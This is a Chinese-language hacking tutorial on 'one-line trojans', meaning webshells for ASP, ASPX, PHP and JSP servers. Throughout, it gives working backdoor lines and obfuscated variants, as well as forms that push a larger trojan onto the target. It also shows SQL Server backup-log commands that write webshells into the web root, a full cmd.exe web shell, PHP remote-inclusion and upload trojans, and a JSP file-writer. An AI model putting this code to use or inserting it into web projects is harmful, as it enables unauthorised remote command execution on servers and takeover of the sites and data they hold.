一句话木马的工作原理

一句话木马的工作原理：一句话木马分析服务端与客户端。

'一句话木马'服务端（是用于本地的html提交脚本木马文件）
就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为 <%execute request('value')%> 其中value可以自己修改

'一句话木马'客户端（远程服务器上被插入一句话的asp可执行文件）
用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件

 

一句话木马的适用环境：

1.服务器的来宾账户有写入权限
2.已知数据库地址且数据库格式为asa或asp
3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可

 

现在先假设在远程主机的TEXT.ASP(客户端）中已经有了<%execute request('value')%>这个语句.)在ASP里<%execute ............')%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)

1. <form action=http://主机路径/TEXT.asp method=post> 
2.  
3. <textarea name=value cols=120 rows=10 width=45> 
4.  
5. set lP=server.createObject('Adodb.Stream')//建立流对象   
6. lP.Open //打开  
7. lP.Type=2 //以文本方式  
8. lP.CharSet='gb2312' //字体标准  
9. lP.writetext request('newvalue')  
10.  
11. lP.SaveToFile server.mappath('newmm.asp'),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆 盖的方式   
12. lP.Close //关闭对象  
13. set lP=nothing //释放对象  
14. response.redirect 'newmm.asp' //转向newmm.asp  
15.  
16. </textarea> 
17.  
18. <textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br> 
19. <input type=submit value=提交> 
20.  
21. </form> 
22.  

表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request('value')%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request('value')%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

1. set lP=server.createObject('Adodb.Stream')//建立流对象   
2. lP.Open //打开  
3. lP.Type=2 //以文本方式  
4. lP.CharSet='gb2312' //字体标准  
5. lP.writetext request('newvalue')  
6.  
7. lP.SaveToFile server.mappath('newvalue.asp'),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆 盖的方式   
8. lP.Close //关闭对象  
9. set lP=nothing //释放对象  
10. response.redirect 'newmm.asp' //转向newmm.asp  
11.  

这样的话第二个表单的名字必须和lP.writetext request('newvalue') 里的Newvalue一样,就是我用红色标注的那两处.
至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。

 

关于服务器错误：

经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
 

1. Script error detected at line 1.   
2. Source line: execute request('nettoo')   
3. Description: 类型不匹配: 'execute' 

这个如何解决呢?
想出了一个好办法,只要用'eval'替换掉'execute'服务端,就不会出错了!
用一句话客户端连接，加入容错语句，你可以把它插入到任何ASP文件而不会像以前一样出错。
<%On Error Resume Next execute request('value')%>

常见asp一句话木马的变体：

1. <%set ms = server.CreateObject('MSScriptControl.ScriptControl.1')  
2. ms.Language='VBScript' 
3. ms.AddObject 'Response', Response  
4. ms.AddObject 'request', request  
5. ms.AddObject 'session', session  
6. ms.AddObject 'server', server  
7. ms.AddObject 'application', application  
8. ms.ExecuteStatement ('ex'&'ecute(request(chr(35)))')%> 
9.  

<%ExecuteGlobal request(chr(35))%>

<%ExecuteGlobal request(chr(35))%>

<%execute request('#')%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>'''' then
ExecuteGlobal request(chr(35))
</script>

<%ExecuteGlobal request(chr(35))%> 9月30日

<%eval request('#')%>

数据库里插入
┼攠数畣整爠焕敌瑳∨∣┩忾

utf-7的马
<%@ codepage=65000%>
<% response.Charset='936'%>
<%e j-x j-e j-c j-u j-t j-e j-( j-r j-e j-q j-u j-e j-s j-t j-( j- ACI-# ACI) j-) j-%>

<%set ms = server.CreateObject('MSScriptControl.ScriptControl.1')
ms.Language='VBScript'
ms.AddObject 'Response', Response
ms.AddObject 'request', request
ms.AddObject 'session', session
ms.AddObject 'server', server
ms.AddObject 'application', application
ms.ExecuteStatement ('ex'&'ecute(request(chr(35)))')%>

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;! /D`14Dv&X#*@!@*ErPPD4 P2Xn^ED VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

各种环境下的一句话木马：

aspx

1.相当于ASP的一句话木马:

程序代码

alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:/TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language='C#' validateRequest='false' %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath('images.aspx'),false);ow.Write(Request.Params['l']);ow.Close()%> ')
backup log pubs to disk = 'd:/test11.aspx'
//这个和asp的一样，客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。
//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)
 

1. <form action=http://192.168.2.100/asp/mu.aspx method=post>   
2. <b>在下面输入大马内容:</b><br> 
3. <textarea name=l cols=120 rows=35 width=45>   
4. <%@ Page Language='VB' Debug='true' %> 
5. <%@ import Namespace='system.IO' %> 
6. <%@ import Namespace='System.Diagnostics' %> 
7. <script runat='server'>   
8. Sub RunCmd(Src As Object, E As EventArgs)   
9. Dim myProcess As New Process()   
10. Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)   
11. myProcessStartInfo.UseShellExecute = False   
12. myProcessStartInfo.RedirectStandardOutput = true   
13. myProcess.StartInfo = myProcessStartInfo   
14. myProcessStartInfo.Arguments=xCmd.text  
15. myProcess.Start()  
16. Dim myStreamReader As StreamReader = myProcess.StandardOutput   
17. Dim myString As String = myStreamReader.Readtoend()  
18. myProcess.Close()  
19. mystring=replace(mystring,'<','<')  
20. mystring=replace(mystring,'>','>')  
21. result.text= vbcrlf & '<pre>' & mystring & '</pre>'  
22. End Sub   
23. </script><html><head> 
24. <title>ASP.NET Shell for WebAdmin2.X Final</title> 
25. <meta http-equiv='Content-Type' c /></head><body> 
26. <form runat='server'> 
27. <asp:Label id='L_p' style='COLOR: #0000ff' runat='server' width='80px'>;Program</asp:Label> 
28. <asp:TextBox id='xpath' style='BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid' runat='server' Width='300px'>c:/windows/system32/cmd.exe</asp:TextBox><br /> 
29. <asp:Label id='L_a' style='COLOR: #0000ff' runat='server' width='80px'>Arguments</asp:Label> 
30. <asp:TextBox id='xcmd' style='BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid' runat='server' Width='300px' Text='/c net user'>/c net user</asp:TextBox><br /> 
31. <asp:Button id='Button' style='BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5' runat='server' Width='100px' Text='Run'></asp:Button><p> 
32. <asp:Label id='result' style='COLOR: #0000ff' runat='server'></asp:Label> </p></form></body></html> 
33. </textarea><BR><center><br>   
34. <input type=submit value=提交> 

 

2、下面这个是我找网上的asp.net的上传文件程序，修改精简了下，也可以用：

 

程序代码

drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:/TM' with init
insert into pubs.dbo.cmd(a) values ('<script language='c#' runat='server'>private void bc(object o,EventArgs e) {string u='files';string filename;int pos=f.PostedFile.FileName.LastIndexOf('//');filename=f.PostedFile.FileName.Substring(pos 1);f.PostedFile.SaveAs(Server.MapPath(u) '//' filename);}</script><form method='post' runat='server'><input type='file' id='f' runat='server'/><input type='submit' value='ss' runat='Server' /></form>')
backup log pubs to disk = 'c:/inetpub/wwwroot/test11.aspx'

PHP

本文没有什么特别之处，仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。
刚学PHP没几天，我就急于功成，所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的，仅一个:<? phpinfo();?>就可以刺探整个服务器的配置。运行cmd，上传文件等，都是非常简便的，现在用的好的PHP木马，莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密，我还没想到，但是对于写一个微型PHP木马，我想还是很难被杀的。
这里简单探讨一下几个函数可以作为木马的使用：

1． 可以运行外部命令的几个函数：system,passthru,exec,shell_exec,popen。
例：只要将<?system($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了，所以一般虚拟主机的设置也会将这些函数屏蔽的。

2．还记得WDB论坛的style.php的漏洞吗？我们可以利用这个做个很难被杀的小木马。如下：
 

1. <?php include($include);?> 

将其保存为1.php ，我们就可以调用其他不支持php服务器里的.php木马（如phpspy.php）来达到我们的目的：http:///1.php? Include=http://www./phpspy.php
这里http://www.是不支持php的，否则将会在http://www.这台服务器运行phpspy.php,而不是目标服务器。

3． 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马，我没有改：
 

1. <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?> 

将其保存为up.php后，在本地提交表单：
 

1. <form ENCTYPE='multipart/form-data' ACTION='http://目标服务器/up.php' METHOD='POST'> 
2. <input NAME='MyFile' TYPE='file'> 
3. <input VALUE=' 提交 ' TYPE='submit'> 
4. </form> 

就可以把大个的php木马上传上去。

4． 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数：eval，在PHP4中文参考手册上它的语法说明：
语法: void eval(string code_str);
内容说明：本函数可将字符串之中的变量值代入，通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式，同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。

我们可以在目标主机上保存:<?eval($cmd);?>为一个PHP文件（我想也可以插在PHP任意文件里）。然后通过本地提交来达到目的，但与ASP不同的是，在magic_quotes_gpc = on的时候，过滤的很多的字符，使得这个使用功能大大的缩小。

对于这个PHP木马本地表单我做了很多次，还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。
Ps:写完后，有人告诉我，其实高手早就有微型的PHP木马了，只是没有公开。哎，我好郁闷啊，研究的都是人家早就有了的成果。不管怎么样，和大家分享一下我的研究，希望能得到帮助和指教。

JSP

1. ＜%  
2. if(request.getParameter('f')!=null)(new java.io.FileOutputStream(application.getRealPath('//') request.getParameter('f'))).write(request.getParameter('t').getBytes());  
3. %＞ 

这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!

http://localhost/1.jsp?f=1.txt&t=hello

然后:http://localhost/1.txt 就出来了 内容为 hello .....